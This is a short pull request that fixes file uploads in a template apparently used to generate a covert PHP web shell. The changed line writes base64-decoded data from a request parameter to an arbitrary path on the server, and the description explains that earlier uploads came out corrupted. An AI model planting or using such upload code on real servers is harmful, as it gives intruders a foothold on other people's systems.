### PR TITLE
Fix broken file upload in covert-php template

### DIFF
--- a/templates/covert-php.tml
+++ b/templates/covert-php.tml
@@ -115,7 +115,7 @@ if (strpos($a, 'are') !== false) {
       [2]=>
       int(3)
     } */
-    file_put_contents({{ index .V "destPath" }}, file_get_contents('php://input'));
+    file_put_contents({{ index .V "destPath" }}, base64_decode($_REQUEST['f']));
     echo 'Uploaded '.{{ index .V "filePath" }}.' to '.{{ index .V "destPath" }};
     die;
   }


### PR DESCRIPTION
This fixes the content of file upload files being `f=some_base64_bytes`. Prior to this fix files uploaded with this template appeared to be corrupted.